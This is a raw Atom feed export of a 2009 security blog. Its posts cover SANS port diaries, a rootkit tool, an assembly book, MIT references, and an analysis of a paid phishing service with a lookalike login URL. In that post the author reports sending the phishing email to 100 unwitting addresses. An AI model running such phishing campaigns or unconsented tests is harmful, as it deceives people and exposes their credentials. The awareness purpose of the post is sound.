href="http://isc.sans.org/diary.html?storyid=7294"&gt;Port 25 - SMTP&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 07 - &lt;a href="http://isc.sans.org/diary.html?storyid=7285"&gt;Port 6667/8/9/7000 - IRC: is it evil?&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 06 - &lt;a href="http://isc.sans.org/diary.html?storyid=7279"&gt;ports 67&amp;68 udp - bootp and dhcp&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 05 - &lt;a href="http://isc.sans.org/diary.html?storyid=7273"&gt;port 31337&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 04 - &lt;a href="http://isc.sans.org/diary.html?storyid=7234"&gt;Port 20/21 - FTP-data/FTP&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 03 - &lt;a href="http://isc.sans.org/diary.html?storyid=7231"&gt;Port 5900 - VNC&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 02 - &lt;a href="http://isc.sans.org/diary.html?storyid=7216"&gt;Port 0&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 01 - &lt;a href="http://isc.sans.org/diary.html?storyid=7210"&gt;Port 445 - SMB over TCP&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;It is really good to have someone/team, talking about valuable stuff that not many others think about.&lt;br /&gt;&lt;br /&gt;Good work Sans!&lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-8833350839206246843?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/8833350839206246843/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=8833350839206246843' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8833350839206246843'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8833350839206246843'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/15-day-summary-sans-cyber-security.html' title='15 day summary - SANS - Cyber Security Awareness Month'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-4805464639506520157</id><published>2009-10-16T09:09:00.003-11:00</published><updated>2009-10-16T09:13:56.889-11:00</updated><title type='text'>SpyDLLRemover -  10,000 downloads from RootkitAnalytics.com</title><content type='html'>Hello folks,&lt;br /&gt;&lt;br /&gt;Just noticed that we reached 10,000 downloads for SpyDLLRemover from the main site, RootkitAnalytics.com. &lt;br /&gt;&lt;br /&gt;PortableApps.com is now releasing SpyDLLRemover among their Security Suite of tools next week. The test release is &lt;a href="http://portableapps.com/node/21044"&gt;&lt;b&gt;here&lt;/b&gt;&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Thank you for your support guys. &lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-4805464639506520157?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/4805464639506520157/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=4805464639506520157' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/4805464639506520157'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/4805464639506520157'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/spydllremover-10000-downloads-from.html' title='SpyDLLRemover -  10,000 downloads from RootkitAnalytics.com'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-111427812982571344</id><published>2009-10-16T06:49:00.005-11:00</published><updated>2009-10-17T08:53:58.200-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='review'/><title type='text'>Book of the Month - "The Art of Assembly Language"</title><content type='html'>&lt;span style="font-weight:bold;"&gt;The Art of Assembly Language&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_gJDtaXmerr4/StiyvMCr5yI/AAAAAAAAAVQ/9mfrWuWcV6A/s1600-h/aoa.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 255px; height: 320px;" src="http://2.bp.blogspot.com/_gJDtaXmerr4/StiyvMCr5yI/AAAAAAAAAVQ/9mfrWuWcV6A/s320/aoa.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5393257077532256034" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Chapter Listings:&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-weight:bold;"&gt;Contents&lt;br /&gt;&lt;br /&gt;Chapter 1 : Hello,World of Assembly Language&lt;br /&gt;&lt;br /&gt;Chapter 2 : Data Representation&lt;br /&gt;&lt;br /&gt;Chapter 3 : Memory Access and Organization&lt;br /&gt;&lt;br /&gt;Chapter 4 : Constants, Variables and Data Types&lt;br /&gt;&lt;br /&gt;Chapter 5 : Procedures and Units&lt;br /&gt;&lt;br /&gt;Chapter 6 : Arithmetic&lt;br /&gt;&lt;br /&gt;Chapter 7 : Low Level Control Structures&lt;br /&gt;&lt;br /&gt;Chapter 8 : Files&lt;br /&gt;&lt;br /&gt;Chapter 9 : Advanced Arithmetic&lt;br /&gt;&lt;br /&gt;Chapter 10: Macros and the HLA Compile Time Language&lt;br /&gt;&lt;br /&gt;Chapter 11: Bit Manipulation&lt;br /&gt;&lt;br /&gt;Chapter 12: The String Instructions&lt;br /&gt;&lt;br /&gt;Chapter 13: The MMX Instruction Set&lt;br /&gt;&lt;br /&gt;Chapter 14: Classes and Objects&lt;br /&gt;&lt;br /&gt;Chapter 15: Mixed Language Programming&lt;br /&gt;&lt;br /&gt;Appendix A: ASCII Character Set&lt;br /&gt;&lt;br /&gt;Appendix B: The 80x86 Instruction Set&lt;br /&gt;&lt;br /&gt;Index&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;This book deserved an applause for its:&lt;br /&gt;&lt;blockquote&gt;Structural flow&lt;br /&gt;Language [simplicity]&lt;br /&gt;Overall content coverage&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Thank you Randall Hyde - For sharing your skills in this book, and Thanks to NoStarch press for publishing it.&lt;br /&gt;&lt;br /&gt;You can buy it at &lt;a href="http://nostarch.com/assembly.htm"&gt;NoStarch Press&lt;/a&gt;, as both PDF and/or Paper copy.&lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-111427812982571344?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/111427812982571344/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=111427812982571344' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/111427812982571344'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/111427812982571344'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/book-of-month-art-of-assembly-language.html' title='Book of the Month - &quot;The Art of Assembly Language&quot;'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_gJDtaXmerr4/StiyvMCr5yI/AAAAAAAAAVQ/9mfrWuWcV6A/s72-c/aoa.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-1186846780421610096</id><published>2009-10-16T05:14:00.005-11:00</published><updated>2009-10-17T16:10:18.941-11:00</updated><title type='text'>Operating System Engineering - Assembly Language - MIT Materials</title><content type='html'>Assembly Language programming links to several free materials available at Operating System Engineering course.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://pdos.csail.mit.edu/6.828/2009/reference.html"&gt;References&lt;/a&gt; page has reference to all the following materials:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;Selection of Operating System Papers&lt;br /&gt;Available on the 6.828 schedule.&lt;br /&gt;UNIX&lt;br /&gt;&lt;br /&gt;    * The UNIX Time-Sharing System, Dennis M. Ritchie and Ken L.Thompson,. Bell System Technical Journal 57, number 6, part 2 (July-August 1978) pages 1905-1930. (local copy) You read this paper in 6.033.&lt;br /&gt;&lt;br /&gt;    * The Evolution of the Unix Time-sharing System, Dennis M. Ritchie, 1979.&lt;br /&gt;&lt;br /&gt;    * The C programming language (second edition) by Kernighan and Ritchie. Prentice Hall, Inc., 1988. ISBN 0-13-110362-8, 1998. &lt;br /&gt;&lt;br /&gt;x86 Emulation&lt;br /&gt;&lt;br /&gt;    * QEMU - A fast and popular x86 platform and CPU emulator.&lt;br /&gt;&lt;br /&gt;          o User manual &lt;br /&gt;&lt;br /&gt;    * Bochs - A more mature, but quirkier and much slower x86 emulator. Bochs is generally a more faithful emulator of real hardware than QMEU.&lt;br /&gt;&lt;br /&gt;          o User manual&lt;br /&gt;&lt;br /&gt;          o Debugger reference &lt;br /&gt;&lt;br /&gt;x86 Assembly Language&lt;br /&gt;&lt;br /&gt;    * PC Assembly Language, Paul A. Carter, November 2003. (local copy)&lt;br /&gt;&lt;br /&gt;    * Intel 80386 Programmer's Reference Manual, 1987 (HTML). (local copy - PDF) (local copy - HTML)&lt;br /&gt;&lt;br /&gt;      Much shorter than the full current Intel Architecture manuals below, but describes all processor features used in 6.828.&lt;br /&gt;&lt;br /&gt;    * IA-32 Intel Architecture Software Developer's Manuals, Intel, 2007. Local copies:&lt;br /&gt;&lt;br /&gt;          o Volume I: Basic Architecture&lt;br /&gt;&lt;br /&gt;          o Volume 2A: Instruction Set Reference, A-M&lt;br /&gt;&lt;br /&gt;          o Volume 2B: Instruction Set Reference, N-Z&lt;br /&gt;&lt;br /&gt;          o Volume 3A: System Programming Guide, Part 1&lt;br /&gt;&lt;br /&gt;          o Volume 3B: System Programming Guide, Part 2&lt;br /&gt;&lt;br /&gt;    * Multiprocessor references:&lt;br /&gt;&lt;br /&gt;          o MP specification&lt;br /&gt;&lt;br /&gt;          o IO APIC &lt;br /&gt;&lt;br /&gt;    * AMD64 Architecture Programmer's Manual.&lt;br /&gt;&lt;br /&gt;      Covers both the "classic" 32-bit x86 architecture and the new 64-bit extensions supported by the latest AMD and Intel processors.&lt;br /&gt;&lt;br /&gt;    * Writing inline assembly language with GCC:&lt;br /&gt;&lt;br /&gt;          o Brennan's Guide to Inline Assembly, Brennan "Mr. Wacko" Underwood&lt;br /&gt;&lt;br /&gt;          o Inline assembly for x86 in Linux, Bharata B. Rao, IBM&lt;br /&gt;&lt;br /&gt;          o GCC-Inline-Assembly-HOWTO, Sandeep.S &lt;br /&gt;&lt;br /&gt;    * Loading x86 executables in the ELF format:&lt;br /&gt;&lt;br /&gt;          o Tool Interface Standard (TIS) Executable and Linking Format (ELF).&lt;br /&gt;            The definitive standard for the ELF format. &lt;br /&gt;&lt;br /&gt;PC Hardware Programming&lt;br /&gt;&lt;br /&gt;    * General PC architecture information&lt;br /&gt;&lt;br /&gt;          o Phil Storrs PC Hardware book, Phil Storrs, December 1998.&lt;br /&gt;&lt;br /&gt;          o Bochs technical hardware specifications directory. &lt;br /&gt;&lt;br /&gt;    * General BIOS and PC bootstrap&lt;br /&gt;&lt;br /&gt;          o BIOS Services and Software Interrupts, Roger Morgan, 1997.&lt;br /&gt;&lt;br /&gt;          o "El Torito" Bootable CD-ROM Format Specification, Phoenix/IBM, January 1995. &lt;br /&gt;&lt;br /&gt;    * VGA display - kern/console.c&lt;br /&gt;&lt;br /&gt;          o VESA BIOS Extension (VBE) 3.0, Video Electronics Standards Association, September 1998. (local copy)&lt;br /&gt;&lt;br /&gt;          o VGADOC, Finn Thøgersen, 2000. (local copy - text) (local copy - ZIP)&lt;br /&gt;&lt;br /&gt;          o Free VGA Project, J.D. Neal, 1998. &lt;br /&gt;&lt;br /&gt;    * Keyboard and Mouse - kern/console.c&lt;br /&gt;&lt;br /&gt;          o Adam Chapweske's resources. &lt;br /&gt;&lt;br /&gt;    * 8253/8254 Programmable Interval Timer (PIT) - inc/timerreg.h&lt;br /&gt;&lt;br /&gt;          o 82C54 CHMOS Programmable Interval Timer, Intel, October 1994. (local copy)&lt;br /&gt;&lt;br /&gt;          o Data Solutions 8253/8254 Tutorial, Data Solutions. &lt;br /&gt;&lt;br /&gt;    * 8259/8259A Programmable Interrupt Controller (PIC) - kern/picirq.*&lt;br /&gt;&lt;br /&gt;          o 8259A Programmable Interrupt Controller, Intel, December 1988. &lt;br /&gt;&lt;br /&gt;    * Real-Time Clock (RTC) - kern/kclock.*&lt;br /&gt;&lt;br /&gt;          o Phil Storrs PC Hardware book, Phil Storrs, December 1998. In particular:&lt;br /&gt;&lt;br /&gt;                + Understanding the CMOS&lt;br /&gt;&lt;br /&gt;                + A list of what is in the CMOS &lt;br /&gt;&lt;br /&gt;          o CMOS Memory Map, Padgett Peterson, May 1996.&lt;br /&gt;&lt;br /&gt;          o M48T86 PC Real-Time Clock, ST Microelectronics, April 2004. (local copy) &lt;br /&gt;&lt;br /&gt;    * 16550 UART Serial Port - kern/console.c&lt;br /&gt;&lt;br /&gt;          o PC16550D Universal Asynchronous Receiver/Transmitter with FIFOs, National Semiconductor, 1995.&lt;br /&gt;&lt;br /&gt;          o Technical Data on 16550, Byterunner Technologies.&lt;br /&gt;&lt;br /&gt;          o Interfacing the Serial / RS232 Port, Craig Peacock, August 2001. &lt;br /&gt;&lt;br /&gt;    * IEEE 1284 Parallel Port - kern/console.c&lt;br /&gt;&lt;br /&gt;          o Parallel Port Central, Jan Axelson.&lt;br /&gt;&lt;br /&gt;          o Parallel Port Background, Warp Nine Engineering.&lt;br /&gt;&lt;br /&gt;          o IEEE 1284 - Updating the PC Parallel Port, National Instruments.&lt;br /&gt;&lt;br /&gt;          o Interfacing the Standard Parallel Port, Craig Peacock, August 2001. &lt;br /&gt;&lt;br /&gt;    * IDE hard drive controller - fs/ide.c&lt;br /&gt;&lt;br /&gt;          o AT Attachment with Packet Interface - 6 (working draft), ANSI, December 2001.&lt;br /&gt;&lt;br /&gt;          o Programming Interface for Bus Master IDE Controller, Brad Hosler, Intel, May 1994.&lt;br /&gt;&lt;br /&gt;          o The Guide to ATA/ATAPI documentation, Constantine Sapuntzakis, January 2002. &lt;br /&gt;&lt;br /&gt;    * Sound cards (not supported in 6.828 kernel, but you're welcome to do it as a challenge problem!)&lt;br /&gt;&lt;br /&gt;          o Sound Blaster Series Hardware Programming Guide, Creative Technology, 1996.&lt;br /&gt;&lt;br /&gt;          o 8237A High Performance Programmable DMA Controller, Intel, September 1993.&lt;br /&gt;&lt;br /&gt;          o Sound Blaster 16 Programming Document, Ethan Brodsky, June 1997.&lt;br /&gt;&lt;br /&gt;          o Sound Programming, Inverse Reality. &lt;br /&gt;&lt;br /&gt;    * E100 Network Interface Card&lt;br /&gt;&lt;br /&gt;          o Intel 8255x 10/100 Mbps Ethernet Controller Family Open Source Software Developer Manual&lt;br /&gt;&lt;br /&gt;          o 82559ER Fast Ethernet PCI Controller Datasheet&lt;br /&gt;&lt;br /&gt;          o The 82559 EEPROM &lt;br /&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Really Good Stuff. &lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-1186846780421610096?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/1186846780421610096/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=1186846780421610096' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1186846780421610096'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1186846780421610096'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/operating-system-engineering-assembly.html' title='Operating System Engineering - Assembly Language - MIT Materials'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-3547389406186430503</id><published>2009-10-16T04:45:00.001-11:00</published><updated>2009-10-16T04:45:45.157-11:00</updated><title type='text'>ZDNET: Does software piracy lead to higher malware infection rates?</title><content type='html'>&lt;a href="http://blogs.zdnet.com/security/?p=4605"&gt;Does software piracy lead to higher malware infection rates?&lt;/a&gt; - Very nice posting... something to think about...&lt;br /&gt;&lt;br /&gt;Does this mean open-source software is better off, since we could see the code. But even if the code is provided, can all the end users understand whats on the code? Freeware could also be infected, since the code ain't open. The only solution that we could think of, is to certify all the software downloads before them getting downloaded. Which means, that someone would be or would have already written an application for that. But, would that application also be malicious, would that application also bring in malware? Who knows...&lt;br /&gt;&lt;br /&gt;The answer always is "It Depends..."&lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-3547389406186430503?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/3547389406186430503/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=3547389406186430503' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3547389406186430503'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3547389406186430503'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/zdnet-does-software-piracy-lead-to.html' title='ZDNET: Does software piracy lead to higher malware infection rates?'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-3882939406594205392</id><published>2009-10-10T13:25:00.002-11:00</published><updated>2009-10-10T13:39:56.176-11:00</updated><title type='text'>Level of (im)maturity in prevention</title><content type='html'>A few days ago I received an email (not arrived as spam) that I am attracted wide attention, so I wanted to know its origin. Here you can see a screenshot of the email.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Ppq0fEGkHo4/Ss6aTjBiScI/AAAAAAAAB04/l96LEOb8xyA/s1600-h/mipistus-iphone-falso.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 248px;" src="http://1.bp.blogspot.com/_Ppq0fEGkHo4/Ss6aTjBiScI/AAAAAAAAB04/l96LEOb8xyA/s400/mipistus-iphone-falso.png" alt="" id="BLOGGER_PHOTO_ID_5390415464618936770" border="0" /&gt;&lt;/a&gt;This is a false message intentionally sent to my email. The first thing that crossed my mind to see it was, first, the memory of the old "xploits" he thought, mistakenly, missing the fact only because it's easy to underestimate them and their condition very crude attempt to deceive users, on the other, questions will be effective ... today?, what's the level of preventing users from this sort of cheating?&lt;br /&gt;&lt;br /&gt;The point is that I also wanted to know their origins. And so I came up a website that offers the "service", specifically, to send this sort of cheating with several alternatives regarding the strategies employed. And of course ... actually, not that the "xploits" ceased to exist but they changed their nomenclature, as this is nothing to Phishing.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Ss6ae1aXYCI/AAAAAAAAB1A/Ei71I4npVyg/s1600-h/mipistus-xploit-inicio.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 166px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Ss6ae1aXYCI/AAAAAAAAB1A/Ei71I4npVyg/s400/mipistus-xploit-inicio.png" alt="" id="BLOGGER_PHOTO_ID_5390415658533478434" border="0" /&gt;&lt;/a&gt;However, before dealing in more detail some features of this site, I'd like to share some of the arguments expressed by the author directly through the "terms of use." The first thing we read is welcome ...&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;"Interested to discover passwords of friends, boyfriends/as, heads, enemies/as of who you want? You know that getting the password of your victim could get many things as personal data, data access and personal sites plenty of information." &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This type of activity is punishable in most countries since the mail has the character of private ... condoning the crime? Besides ... someone wants to access my email account :)&lt;br /&gt;&lt;br /&gt;It continues with some things &lt;strike&gt;funny&lt;/strike&gt; curious that I share... &lt;span style="font-style: italic;"&gt;"All the information provided here is for educational use and/or science." &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;"Scientific use?... without words...&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;"Our software is not designed to be used for malevolent purposes, the product was intended for responsible adults, not every person under age 18 may use our programs."&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;However, to access the site doesn't display a warning stating that they can only access the site over 18 years...&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;"Spyware programs were created as a solution for remote monitoring and surveillance of the computer."&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;From the perspective in which information security discusses these aspects, is nothing but an act framed in the guise of privacy violation. There are alternative, less intrusive and aggressive for the purposes of parents who want to "monitor" certain activities of their children without coming to an abusive state. In this regard I consider the best solution is useless if not accompanied by education regarding the dangers that exist online. The question isn't spying on our children...&lt;br /&gt;&lt;br /&gt;Aside from the superficial to the mechanism of deception, the domain is hosted at Hosting Solutions International Inc, located in the U.S. under the IP address 69.64.58.50. At least three domains are in this direction and all redirected to the same page.&lt;br /&gt;&lt;br /&gt;When you access this "service", we find a menu which is managed by the maneuvers of deception, allowing sending emails with fake messages to the main services (real) webmail and two of the most popular social networks. Even you can customize the messages.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/Ss6cep5ROkI/AAAAAAAAB1I/RLKL1yhXv8c/s1600-h/mipistus-xploit.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 146px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/Ss6cep5ROkI/AAAAAAAAB1I/RLKL1yhXv8c/s400/mipistus-xploit.png" alt="" id="BLOGGER_PHOTO_ID_5390417854465129026" border="0" /&gt;&lt;/a&gt;The procedure, after selecting the service option to be used to provide a consistent level of confidence is a matter of selecting one option among several. As an example, consider a snapshot of a Gmail account bombarded with an example of each.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Ss6clwu6AKI/AAAAAAAAB1Q/PlvKOW9_b5c/s1600-h/mipistus-mails-recibidos.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 133px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Ss6clwu6AKI/AAAAAAAAB1Q/PlvKOW9_b5c/s400/mipistus-mails-recibidos.png" alt="" id="BLOGGER_PHOTO_ID_5390417976559796386" border="0" /&gt;&lt;/a&gt;All contain in the body of the message, that address links to a fake page, in this case of Gmail, which requests an authentication process that is part of the deception. The page is a clone of the real and you are looking to steal user's authentication data to the webmail service. But according to this, the question is ... how do realize that is false?&lt;br /&gt;&lt;br /&gt;Mainly, checking where to redirect the links found in the message. With the mere fact of passing the mouse over the link in the taskbar is the actual address.&lt;br /&gt;&lt;br /&gt;Likewise, we must check the URL. In this case, the address begins with http://&lt;span style="font-weight: bold;"&gt;login.live.1d8gfh35f9h6438d2g6.tumsg.com&lt;/span&gt;/accounts/ServiceLogin.php?service false...&lt;br /&gt;&lt;br /&gt;While the real beginning with&lt;br /&gt;https://w&lt;span style="font-weight: bold;"&gt;ww.google.com&lt;/span&gt;/accounts/ServiceLogin?service...&lt;br /&gt;&lt;br /&gt;Besides being completely different, false doesn't have the secure protocol (https) characteristic of all sites that require authentication via the web. While this particular aspect doesn't guarantee full security is a good habit to check your existence.&lt;br /&gt;&lt;br /&gt;However, suppose that the attack is directed to a Hotmail user. The real address for this is:&lt;br /&gt;&lt;br /&gt;http://&lt;span style="font-weight: bold;"&gt;login.live.com&lt;/span&gt;/login.srf?wa=wsignin1.0&amp;amp;rpsnv=11&amp;amp;ct=1255052408&amp;amp;rver=6.0.5285.0&amp;amp;wp=MBI&amp;amp;wreply=http:%2F%2Fmail.live.com%2fdefault.aspx&amp;amp;lc=3082&amp;amp;id=64855&amp;amp;mkt=en-&lt;br /&gt;&lt;br /&gt;In this case we aren't with "https" and the false address is very similar to the real, which, it's likely that a user who doesn't understand much about it, fall into the trap without too much effort, but wonder... How many users verify the address?&lt;br /&gt;&lt;br /&gt;Now, try to find some answers to the questions discussed above lines (are they effective now?, What is the level of preventing users from this sort of cheating?)&lt;br /&gt;&lt;br /&gt;To obtain a test that was done was basically sending emails with fake messages using the "services" offered by this website, obviously under strict ethical sense as the intention is only investigative. Moreover, unless they pay a minimum cost of USD 15, there is no access to passwords.&lt;br /&gt;&lt;br /&gt;What the business makes it evident that behind this system of deception. Also at the same time, its creators are made from a large database which until now has over 95.000 records, where each of those records is a victim.&lt;br /&gt;&lt;br /&gt;For our purposes, obtain a statistic of the level of maturity in terms of sense of prevention on users, but passwords don't need to know how many users rely on the false message.&lt;br /&gt;&lt;br /&gt;The sample consisted of 100 addresses to which it sent the same message that had come to my email. From one day to another, ie within 24 hours, emails sent Hundred, these were the results:&lt;br /&gt;&lt;br /&gt;Sent: 100&lt;br /&gt;User who fell into the trap: 12&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Ss6d9ZQc4zI/AAAAAAAAB1Y/paCXztC0OSQ/s1600-h/mipistus-victimas.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 130px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Ss6d9ZQc4zI/AAAAAAAAB1Y/paCXztC0OSQ/s400/mipistus-victimas.png" alt="" id="BLOGGER_PHOTO_ID_5390419482086531890" border="0" /&gt;&lt;/a&gt;As we see, a little over 10% of users who received this email with the message you have opened, and not only that, but have also offering trusted him unknowingly credentials data access to your accounts e-mail.&lt;br /&gt;&lt;br /&gt;Accordingly, trivial attacks of this kind are more common than people think and have a worrisome level of effectiveness, but more worrying still is, in a way, that the level of maturity in terms of prevention is still low and that if these values are enhanced depending on the amount of emails of this kind that any spammer could send per day, the final death toll is very high.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Related information&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/01/estado-de-la-seguridad-segn-microsoft.html"&gt;Estado de la seguridad según Microsoft&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2008/12/phishing-y-cuentos-en-navidad-el-final.html"&gt;Phishing y "cuentos" en navidad&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2008/12/phishing-para-american-express-y.html"&gt;Phishing para American Express y consejos&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-3882939406594205392?l=evilfinge
